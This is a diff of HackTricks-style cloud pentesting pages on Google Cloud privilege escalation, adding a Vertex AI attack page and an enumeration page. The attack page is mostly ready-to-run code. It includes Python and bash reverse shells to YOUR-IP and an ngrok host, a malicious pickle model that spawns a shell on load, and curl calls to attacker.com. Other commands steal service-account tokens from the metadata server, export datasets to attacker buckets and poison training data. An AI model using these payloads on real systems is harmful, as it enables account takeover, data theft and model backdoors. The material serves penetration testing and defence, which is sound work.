@@ -73,6 +81,8 @@ Executing the script you can then use git clone, push... and it will work.
With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys:
<details><summary>Disable pushblock and modify pub/sub configuration</summary>
```bash
gcloud source project-configs update --disable-pushblock
```
@@ -84,6 +94,8 @@ gcloud source project-configs update --remove-topic=REMOVE_TOPIC
gcloud source project-configs update --remove-topic=UPDATE_TOPIC
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -33,6 +33,8 @@ For an example on how to modify permissions with this permission check this page
Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.
<details><summary>Create and use HMAC key for privilege escalation</summary>
```bash
# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance
@@ -63,6 +65,8 @@ gsutil ls gs://[BUCKET_NAME]
gcloud config set pass_credentials_to_gsutil true
```
</details>
Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### `storage.objects.create`, `storage.objects.delete` = Storage Write permissions

View File

@@ -0,0 +1,755 @@
# GCP - Vertex AI Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Vertex AI
For more information about Vertex AI check:
{{#ref}}
../gcp-services/gcp-vertex-ai-enum.md
{{#endref}}
### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`
With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can **execute arbitrary code with elevated privileges**.
This works by creating a custom training job that runs attacker-controlled code (either a custom container or Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account's OAuth access token.
**Impact**: Full privilege escalation to the target service account's permissions.
<details>
<summary>Create custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl http://attacker.com" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# On your attacker machine, start a listener first:
# nc -lvnp 4444
# Once connected, you can extract the token with:
# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```
</details>
<details>
<summary>Alternative: Extract token from logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
```
</details>
> [!CAUTION]
> The custom job will run with the specified service account's permissions. Ensure you have `iam.serviceAccounts.actAs` permission on the target service account.
### `aiplatform.models.upload`, `aiplatform.models.get`
This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through and endpoint deployment or batch prediction job.
> [!NOTE]
> To perform this attack it's needed to have a world readable GCS bucket or create a new one to upload the model artifacts.
<details>
<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle
class MaliciousModel:
def __reduce__(self):
import subprocess
cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
return (subprocess.Popen, (['/bin/bash', '-c', cmd],))
# Save malicious model
with open('model.pkl', 'wb') as f:
pickle.dump(MaliciousModel(), f)
EOF
python3 create_malicious_model.py
# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/
# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/malicious-model/ \
--display-name=malicious-sklearn \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```
</details>
<details>
<summary>Upload model with container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
</details>
> [!DANGER]
> After uploading the malicious model an attacker could wait for someone to use the model, or to launch the model him self via and endpoint deployment or batch prediction job.
#### `iam.serviceAccounts.actAs`, ( `aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get` ) or ( `aiplatform.endpoints.setIamPolicy` )
If you have permissions to create and deploy models to endpoints, or modify endpoint IAM policies, you can leverage uploaded malicious models in the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models via an endpoint all you need to do is:
<details>
<summary>Deploy malicious model to endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
--region=<region> \
--display-name=revshell-endpoint
# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
--region=<region> \
--model=<model-id> \
--display-name=revshell-deployment \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
--machine-type=n1-standard-2 \
--min-replica-count=1
```
</details>
#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
If you have permissions to create a **batch prediction jobs** and run it with a service account you can access the metadata service. The malicious code executes from a **custom prediction container** or **malicious model** during the batch prediction process.
**Note**: Batch prediction jobs can only be created via REST API or Python SDK (no gcloud CLI support).
> [!NOTE]
> This attack requires first uploading a malicious model (see `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
<details>
<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
</details>
### `aiplatform.models.export`
If you have the **models.export** permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.
> [!NOTE]
> To perform this attack it's needed to have a world readable and writable GCS bucket or create a new one to upload the model artifacts.
<details>
<summary>Export model artifacts to GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
-d '{
"outputConfig": {
"exportFormatId": "custom-trained",
"artifactDestination": {
"outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
}
}
}'
# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Create **ML pipeline jobs** that execute multiple steps with arbitrary containers and achieve privilege escalation through reverse shell access.
Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.
> [!NOTE]
> You need a world writable GCS bucket to use as the pipeline root.
<details>
<summary>Install Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```
</details>
<details>
<summary>Create pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import json
import subprocess
PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<sa-email>"
# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
"schemaVersion": "2.1.0",
"sdkVersion": "kfp-2.0.0",
"pipelineInfo": {
"name": "data-processing-pipeline"
},
"root": {
"dag": {
"tasks": {
"process-task": {
"taskInfo": {
"name": "process-task"
},
"componentRef": {
"name": "comp-process"
}
}
}
}
},
"components": {
"comp-process": {
"executorLabel": "exec-process"
}
},
"deploymentSpec": {
"executors": {
"exec-process": {
"container": {
"image": "python:3.11-slim",
"command": ["python3"],
"args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
}
}
}
}
}
# Create the request body
request_body = {
"displayName": "ml-training-pipeline",
"runtimeConfig": {
"gcsOutputDirectory": "gs://gstorage-name/folder"
},
"pipelineSpec": pipeline_spec,
"serviceAccount": TARGET_SA
}
# Get access token
token_result = subprocess.run(
["gcloud", "auth", "print-access-token"],
capture_output=True,
text=True,
check=True
)
access_token = token_result.stdout.strip()
# Submit via REST API
import requests
url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)
if response.status_code in [200, 201]:
result = response.json()
print(f"✓ Pipeline job submitted successfully!")
print(f" Job name: {result.get('name', 'N/A')}")
print(f" Check your reverse shell listener for connection")
else:
print(f"✗ Error: {response.status_code}")
print(f" {response.text}")
```
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.
Hyperparameter tuning jobs allow you to run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and associating it with a privileged service account, you can achieve privilege escalation.
**Impact**: Full privilege escalation to the target service account's permissions.
<details>
<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
</details>
### `aiplatform.datasets.export`
Export **datasets** to exfiltrate training data that may contain sensitive information.
**Note**: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).
Datasets often contain the original training data which may include PII, confidential business data, or other sensitive information that was used to train production models.
<details>
<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
-d '{
"exportConfig": {
"gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
}
}'
# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete
# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/
# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
# The exported data may contain:
# - References to training images/files in GCS buckets
# - Dataset annotations and labels
# - PII (Personally Identifiable Information)
# - Sensitive business data
# - Internal documents or communications
# - Credentials or API keys in text data
```
</details>
### `aiplatform.datasets.import`
Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.
**Note**: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).
By importing crafted data into a dataset used for training ML models, an attacker can:
- Introduce backdoors into models (trigger-based misclassification)
- Poison training data to degrade model performance
- Inject data to cause models to leak information
- Manipulate model behavior for specific inputs
This attack is particularly effective when targeting datasets used for:
- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)
<details>
<summary>Import poisoned data into dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
```
</details>
**Attack Scenarios:**
<details>
<summary>Backdoor attack - Image classification</summary>
```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```
</details>
<details>
<summary>Label flipping attack</summary>
```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```
</details>
<details>
<summary>Data poisoning for model extraction</summary>
```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```
</details>
<details>
<summary>Targeted attack on specific entities</summary>
```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```
</details>
> [!DANGER]
> Data poisoning attacks can have severe consequences:
> - **Security systems**: Bypass facial recognition or anomaly detection
> - **Fraud detection**: Train models to ignore specific fraud patterns
> - **Content moderation**: Cause harmful content to be classified as safe
> - **Medical AI**: Misclassify critical health conditions
> - **Autonomous systems**: Manipulate object detection for safety-critical decisions
**Impact**:
- Backdoored models that misclassify on specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models trained on poisoned data will inherit the backdoor)
### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`
> [!WARNING]
> > [!NOTE]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of Vertex AI Workbench Managed Notebooks deprecation. The modern approach is using **Vertex AI Workbench Executor** which runs notebooks through `aiplatform.customJobs.create` (already documented above).
> The Vertex AI Workbench Executor allows scheduling notebook runs that execute on Vertex AI custom training infrastructure with a specified service account. This is essentially a convenience wrapper around `customJobs.create`.
> **For privilege escalation via notebooks**: Use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
**The following technique is provided for historical context only and is not recommended for use in new assessments.**
Create **notebook execution jobs** that run Jupyter notebooks with arbitrary code.
Notebook jobs are ideal for interactive-style code execution with a service account, as they support Python code cells and shell commands.
<details>
<summary>Create malicious notebook file</summary>
```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
"cells": [
{
"cell_type": "code",
"source": [
"import subprocess\n",
"token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
"print(token.decode())"
]
}
],
"metadata": {},
"nbformat": 4
}
EOF
# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```
</details>
<details>
<summary>Execute notebook with target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```
</details>
## References
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,6 +18,8 @@ It's possible to find the documentation of the connectors. For example, this is
And here you can find an example of a connector that prints a secret:
<details><summary>Workflow YAML configuration to access secrets</summary>
```yaml
main:
params: [input]
@@ -33,8 +35,12 @@ main:
return: "${str_secret}"
```
</details>
Update from the CLI:
<details><summary>Deploy and execute workflows from CLI</summary>
```bash
gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
@@ -60,6 +66,8 @@ gcloud workflows executions list <workflow-name>
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
```
</details>
> [!CAUTION]
> You can also check the output of previous executions to look for sensitive information
@@ -74,33 +82,37 @@ According [**to the docs**](https://cloud.google.com/workflows/docs/authenticate
#### Oauth
```yaml
- step_A:
      call: http.post
      args:
          url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
          auth:
              type: OAuth2
              scopes: OAUTH_SCOPE
```
#### OIDC
<details><summary>Workflow HTTP request with OAuth token</summary>
```yaml
- step_A:
      call: http.get
      args:
          url: https://us-central1-project.cloudfunctions.net/functionA
          query:
              firstNumber: 4
              secondNumber: 6
              operation: sum
          auth:
              type: OIDC
              audience: OIDC_AUDIENCE
call: http.post
args:
url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
auth:
type: OAuth2
scopes: OAUTH_SCOPE
```
### `workflows.workflows.update` ...
</details>#### OIDC
<details><summary>Workflow HTTP request with OIDC token</summary>
```yaml
- step_A:
call: http.get
args:
url: https://us-central1-project.cloudfunctions.net/functionA
query:
firstNumber: 4
secondNumber: 6
operation: sum
auth:
type: OIDC
audience: OIDC_AUDIENCE
```
</details>### `workflows.workflows.update` ...
With this permission instead of `workflows.workflows.create` it's possible to update an already existing workflow and perform the same attacks.

View File

@@ -0,0 +1,271 @@
# GCP - Vertex AI Enum
{{#include ../../../banners/hacktricks-training.md}}
## Vertex AI
[Vertex AI](https://cloud.google.com/vertex-ai) is Google Cloud's **unified machine learning platform** for building, deploying, and managing AI models at scale. It combines various AI and ML services into a single, integrated platform, enabling data scientists and ML engineers to:
- **Train custom models** using AutoML or custom training
- **Deploy models** to scalable endpoints for predictions
- **Manage the ML lifecycle** from experimentation to production
- **Access pre-trained models** from Model Garden
- **Monitor and optimize** model performance
### Key Components
#### Models
Vertex AI **models** represent trained machine learning models that can be deployed to endpoints for serving predictions. Models can be:
- **Uploaded** from custom containers or model artifacts
- Created through **AutoML** training
- Imported from **Model Garden** (pre-trained models)
- **Versioned** with multiple versions per model
Each model has metadata including its framework, container image URI, artifact location, and serving configuration.
#### Endpoints
**Endpoints** are resources that host deployed models and serve online predictions. Key features:
- Can host **multiple deployed models** (with traffic splitting)
- Provide **HTTPS endpoints** for real-time predictions
- Support **autoscaling** based on traffic
- Can use **private** or **public** access
- Support **A/B testing** through traffic splitting
#### Custom Jobs
**Custom jobs** allow you to run custom training code using your own containers or Python packages. Features include:
- Support for **distributed training** with multiple worker pools
- Configurable **machine types** and **accelerators** (GPUs/TPUs)
- **Service account** attachment for accessing other GCP resources
- Integration with **Vertex AI Tensorboard** for visualization
- **VPC connectivity** options
#### Hyperparameter Tuning Jobs
These jobs automatically **search for optimal hyperparameters** by running multiple training trials with different parameter combinations.
#### Model Garden
**Model Garden** provides access to:
- Pre-trained Google models
- Open-source models (including Hugging Face)
- Third-party models
- One-click deployment capabilities
#### Tensorboards
**Tensorboards** provide visualization and monitoring for ML experiments, tracking metrics, model graphs, and training progress.
### Service Accounts & Permissions
By default, Vertex AI services use the **Compute Engine default service account** (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`), which has **Editor** permissions on the project. However, you can specify custom service accounts when:
- Creating custom jobs
- Uploading models
- Deploying models to endpoints
This service account is used to:
- Access training data in Cloud Storage
- Write logs to Cloud Logging
- Access secrets from Secret Manager
- Interact with other GCP services
### Data Storage
- **Model artifacts** are stored in **Cloud Storage** buckets
- **Training data** typically resides in Cloud Storage or BigQuery
- **Container images** are stored in **Artifact Registry** or Container Registry
- **Logs** are sent to **Cloud Logging**
- **Metrics** are sent to **Cloud Monitoring**
### Encryption
By default, Vertex AI uses **Google-managed encryption keys**. You can also configure:
- **Customer-managed encryption keys (CMEK)** from Cloud KMS
- Encryption applies to model artifacts, training data, and endpoints
### Networking
Vertex AI resources can be configured for:
- **Public internet access** (default)
- **VPC peering** for private access
- **Private Service Connect** for secure connectivity
- **Shared VPC** support
### Enumeration
```bash
# List models
gcloud ai models list --region=<region>
gcloud ai models describe <model-id> --region=<region>
gcloud ai models list-version <model-id> --region=<region>
# List endpoints
gcloud ai endpoints list --region=<region>
gcloud ai endpoints describe <endpoint-id> --region=<region>
gcloud ai endpoints list --list-model-garden-endpoints-only --region=<region>
# List custom jobs
gcloud ai custom-jobs list --region=<region>
gcloud ai custom-jobs describe <job-id> --region=<region>
# Stream logs from a running job
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
# List hyperparameter tuning jobs
gcloud ai hp-tuning-jobs list --region=<region>
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>
# List model monitoring jobs
gcloud ai model-monitoring-jobs list --region=<region>
gcloud ai model-monitoring-jobs describe <job-id> --region=<region>
# List Tensorboards
gcloud ai tensorboards list --region=<region>
gcloud ai tensorboards describe <tensorboard-id> --region=<region>
# List indexes (for vector search)
gcloud ai indexes list --region=<region>
gcloud ai indexes describe <index-id> --region=<region>
# List index endpoints
gcloud ai index-endpoints list --region=<region>
gcloud ai index-endpoints describe <index-endpoint-id> --region=<region>
# Get operations (long-running operations status)
gcloud ai operations describe <operation-id> --region=<region>
# Test endpoint predictions (if you have access)
gcloud ai endpoints predict <endpoint-id> \
--region=<region> \
--json-request=request.json
# Make direct predictions (newer API)
gcloud ai endpoints direct-predict <endpoint-id> \
--region=<region> \
--json-request=request.json
```
### Model Information Gathering
```bash
# Get detailed model information including versions
gcloud ai models describe <model-id> --region=<region>
# Check specific model version
gcloud ai models describe <model-id>@<version> --region=<region>
# List all versions of a model
gcloud ai models list-version <model-id> --region=<region>
# Get model artifact location (usually a GCS bucket)
gcloud ai models describe <model-id> --region=<region> --format="value(artifactUri)"
# Get container image URI
gcloud ai models describe <model-id> --region=<region> --format="value(containerSpec.imageUri)"
```
### Endpoint Details
```bash
# Get endpoint details including deployed models
gcloud ai endpoints describe <endpoint-id> --region=<region>
# Get endpoint URL
gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(deployedModels[0].displayName)"
# Get service account used by endpoint
gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(deployedModels[0].serviceAccount)"
# Check traffic split between models
